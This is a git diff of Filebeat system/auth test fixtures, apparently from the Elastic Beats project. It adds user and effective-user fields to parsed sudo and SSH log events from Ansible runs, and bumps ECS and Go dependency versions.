2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1074,7 +1318,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1090,7 +1341,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1106,13 +1361,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lwzhcvorajmjyxsrqydafzapoeescwaf; rc=flag; [ -r /etc/metricbeat/metricbeat.yml ] || rc=2; [ -f /etc/metricbeat/metricbeat.yml ] || rc=1; [ -d /etc/metricbeat/metricbeat.yml ] && rc=3; python -V 2>/dev/null || rc=4; [ x\"$rc\" != \"xflag\" ] && echo \"${rc} \"/etc/metricbeat/metricbeat.yml && exit 0; (python -c 'import hashlib; BLOCKSIZE = 65536; hasher = hashlib.sha1();#012afile = open(\"'/etc/metricbeat/metricbeat.yml'\", \"rb\")#012buf = afile.read(BLOCKSIZE)#012while len(buf) > 0:#012#011hasher.update(buf)#012#011buf = afile.read(BLOCKSIZE)#012afile.close()#012print(hasher.hexdigest())' 2>/dev/null) || (python -c 'import sha; BLOCKSIZE = 65536; hasher = sha.sha();#012afile = open(\"'/etc/metricbeat/metricbeat.yml'\", \"rb\")#012buf = afile.read(BLOCKSIZE)#012while len(buf) > 0:#012#011hasher.update(buf)#012#011buf = afile.read(BLOCKSIZE)#012afile.close()#012print(hasher.hexdigest())' 2>/dev/null) || (echo '0 ", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1145,7 +1402,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1161,7 +1425,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1178,7 +1446,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1195,7 +1467,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1211,13 +1487,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-yesyhegdrhiolusidthffdemrxphqdfm; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675262.15-83340738940485/copy; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675262.15-83340738940485/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1234,7 +1512,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1250,7 +1535,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1267,7 +1556,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1283,13 +1576,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-vqbyiylfjufyxlwvxcwusklrtmiekpia; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675263.16-15325827909434/service; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675263.16-15325827909434/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1306,7 +1601,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1322,7 +1624,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1339,7 +1645,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1355,13 +1665,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-osrbplljwskuafamtjuanhwfxqdxmfbj; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675264.47-179299683847940/wait_for; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675264.47-179299683847940/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1378,7 +1690,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1394,7 +1713,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1411,7 +1734,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1427,13 +1754,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-xqypdfdxashhaekghbfnpdlcgsmfarmy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675265.39-273766954542007/service; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675265.39-273766954542007/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1450,7 +1779,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1466,7 +1802,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1483,7 +1823,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1499,13 +1843,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-ktkmpxhjivossxngupfgrqfobhopruzp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675266.58-47565152594552/apt; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675266.58-47565152594552/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1522,7 +1868,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1538,7 +1891,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1555,7 +1912,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1571,13 +1932,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-erpqyqrmifxazcclvbqytjwxgdplhtpy; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675275.74-155140815824587/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675275.74-155140815824587/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1594,7 +1957,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1610,7 +1980,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1627,7 +2001,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1643,13 +2021,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-cfqjebskszjdqpksprlbjpbttastwzyp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675276.62-248748589735433/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675276.62-248748589735433/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1666,7 +2046,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1682,7 +2069,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1699,7 +2090,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1715,13 +2110,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-oxbowrzvfhsebemuiblilqwvdxvnwztv; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675280.28-272460786101534/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675280.28-272460786101534/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -1738,7 +2135,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1754,7 +2158,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -1771,7 +2179,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -1787,13 +2199,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-ohlhhhazvtawqawluadjlxglowwenmyc; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675302.51-201837201796085/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675302.51-201837201796085/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" } ] \ No newline at end of file diff --git a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json index 50134594bfcc..d6319b0e82a1 100644 --- a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json +++ b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json @@ -59,7 +59,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -121,7 +125,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -251,7 +259,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -313,7 +325,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -375,7 +391,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -437,7 +457,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -499,7 +523,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -629,7 +657,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -663,7 +695,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -725,7 +761,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -787,7 +827,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -849,7 +893,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -911,7 +959,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -973,7 +1025,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1114,7 +1170,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1244,7 +1304,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1306,7 +1370,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1368,7 +1436,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1430,7 +1502,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1492,7 +1568,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1622,7 +1702,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1684,7 +1768,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1746,7 +1834,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1808,7 +1900,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -1870,7 +1966,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2000,7 +2100,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2062,7 +2166,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2124,7 +2232,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2237,7 +2349,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2299,7 +2415,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2361,7 +2481,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2423,7 +2547,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2485,7 +2613,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2615,7 +2747,11 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.action": "ssh_login", @@ -2677,6 +2813,10 @@ "related.hosts": [ "slave22" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" } ] \ No newline at end of file diff --git a/filebeat/module/system/auth/test/test.log-expected.json b/filebeat/module/system/auth/test/test.log-expected.json index dc677ebb58c7..25f2b8608b5b 100644 --- a/filebeat/module/system/auth/test/test.log-expected.json +++ b/filebeat/module/system/auth/test/test.log-expected.json @@ -2,7 +2,8 @@ { "event.action": "ssh_login", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "system.auth", "event.kind": "event", @@ -39,7 +40,8 @@ { "event.action": "ssh_login", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "system.auth", "event.kind": "event", @@ -165,13 +167,15 @@ "localhost" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/ls", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -219,13 +223,15 @@ "localhost" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/cat /var/log/secure", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/1", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -242,7 +248,8 @@ "precise32" ], "related.user": [ - "tsg" + "tsg", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/ls", @@ -250,6 +257,7 @@ "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/1", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "tsg" }, { diff --git a/filebeat/module/system/auth/test/timestamp.log-expected.json b/filebeat/module/system/auth/test/timestamp.log-expected.json index 4d428b4d1cce..ccbaedf20398 100644 --- a/filebeat/module/system/auth/test/timestamp.log-expected.json +++ b/filebeat/module/system/auth/test/timestamp.log-expected.json @@ -15,7 +15,14 @@ "related.hosts": [ "localhost" ], - "service.type": "system" + "related.user": [ + "userauth3", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "0", + "user.name": "userauth3" }, { "@timestamp": "2019-06-14T09:31:15.412-02:00", diff --git a/filebeat/module/system/syslog/config/syslog.yml b/filebeat/module/system/syslog/config/syslog.yml index d1d5c5935061..429067177d11 100644 --- a/filebeat/module/system/syslog/config/syslog.yml +++ b/filebeat/module/system/syslog/config/syslog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/traefik/access/config/traefik-access.yml b/filebeat/module/traefik/access/config/traefik-access.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/traefik/access/config/traefik-access.yml +++ b/filebeat/module/traefik/access/config/traefik-access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/go.mod b/go.mod index 7d5c452cc38f..f5407a2e3756 100644 --- a/go.mod +++ b/go.mod @@ -59,17 +59,17 @@ require ( github.com/dustin/go-humanize v1.0.0 github.com/eapache/go-resiliency v1.2.0 github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 - github.com/elastic/ecs v1.6.0 + github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271 github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a github.com/elastic/go-concert v0.1.0 - github.com/elastic/go-libaudit/v2 v2.1.0 + github.com/elastic/go-libaudit/v2 v2.2.0 github.com/elastic/go-licenser v0.3.1 github.com/elastic/go-lookslike v0.3.0 github.com/elastic/go-lumber v0.1.0 github.com/elastic/go-perf v0.0.0-20191212140718-9c656876f595 github.com/elastic/go-seccomp-bpf v1.1.0 github.com/elastic/go-structform v0.0.7 - github.com/elastic/go-sysinfo v1.3.0 + github.com/elastic/go-sysinfo v1.5.0 github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect diff --git a/go.sum b/go.sum index 118df228463f..b7b9053d30b2 100644 --- a/go.sum +++ b/go.sum @@ -247,16 +247,16 @@ github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 h1:DW6W github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2/go.mod h1:H9keYFcgq3Qr5OUJm/JZI/i6U7joQ8SYLhZwfeOo6Ts= github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3 h1:lnDkqiRFKm0rxdljqrj3lotWinO9+jFmeDXIC4gvIQs= github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3/go.mod h1:aPqzac6AYkipvp4hufTyMj5PDIphF3+At8zr7r51xjY= -github.com/elastic/ecs v1.6.0 h1:8NmgfnsjmKXh9hVsK3H2tZtfUptepNc3msJOAynhtmc= -github.com/elastic/ecs v1.6.0/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= +github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271 h1:lEqA6OOU2w/7cce5M2v6ZAaOqsTw2Q3ZFqSgbH0bMyQ= +github.com/elastic/ecs v1.0.0-beta2.0.20210202203518-638aa2bb5271/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a h1:2NHgf1RUw+f240lpTnLrCp1aBNvq2wDi0E1A423/S1k= github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270 h1:cWPqxlPtir4RoQVCpGSRXmLqjEHpJKbR60rxh1nQZY4= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270/go.mod h1:Msl1pdboCbArMF/nSCDUXgQuWTeoMmE/z8607X+k7ng= github.com/elastic/go-concert v0.1.0 h1:gz/yvA3bseuHzoF/lNMltkL30XdPqMo+bg5o2mBx2EE= github.com/elastic/go-concert v0.1.0/go.mod h1:9MtFarjXroUgmm0m6HY3NSe1XiKhdktiNRRj9hWvIaM= -github.com/elastic/go-libaudit/v2 v2.1.0 h1:yWSKoGaoWLGFPjqWrQ4gwtuM77pTk7K4CsPxXss8he4= -github.com/elastic/go-libaudit/v2 v2.1.0/go.mod h1:MM/l/4xV7ilcl+cIblL8Zn448J7RZaDwgNLE4gNKYPg= +github.com/elastic/go-libaudit/v2 v2.2.0 h1:TY3FDpG4Zr9Qnv6KYW6olYr/U+nfu0rD2QAbv75VxMQ= +github.com/elastic/go-libaudit/v2 v2.2.0/go.mod h1:MM/l/4xV7ilcl+cIblL8Zn448J7RZaDwgNLE4gNKYPg= github.com/elastic/go-licenser v0.3.1 h1:RmRukU/JUmts+rpexAw0Fvt2ly7VVu6mw8z4HrEzObU= github.com/elastic/go-licenser v0.3.1/go.mod h1:D8eNQk70FOCVBl3smCGQt/lv7meBeQno2eI1S5apiHQ= github.com/elastic/go-lookslike v0.3.0 h1:HDI/DQ65V85ZqM7D/sbxcK2wFFnh3+7iFvBk2v2FTHs= @@ -272,8 +272,8 @@ github.com/elastic/go-seccomp-bpf v1.1.0/go.mod h1:l+89Vy5BzjVcaX8USZRMOwmwwDScE github.com/elastic/go-structform v0.0.7 h1:ihszOJQryNuIIHE2ZgsbiDq+agKO6V4yK0JYAI3tjzc= github.com/elastic/go-structform v0.0.7/go.mod h1:QrMyP3oM9Sjk92EVGLgRaL2lKt0Qx7ZNDRWDxB6khVs= github.com/elastic/go-sysinfo v1.1.1/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= -github.com/elastic/go-sysinfo v1.3.0 h1:eb2XFGTMlSwG/yyU9Y8jVAYLIzU2sFzWXwo2gmetyrE= -github.com/elastic/go-sysinfo v1.3.0/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= +github.com/elastic/go-sysinfo v1.5.0 h1:6DBn+WmxLz+IJ9MY+MzX2rWQNd04vSRB3TSuXu/2JjU= +github.com/elastic/go-sysinfo v1.5.0/go.mod h1:i1ZYdU10oLNfRzq4vq62BEwD2fH8KaWh6eh0ikPT9F0= github.com/elastic/go-txfile v0.0.7 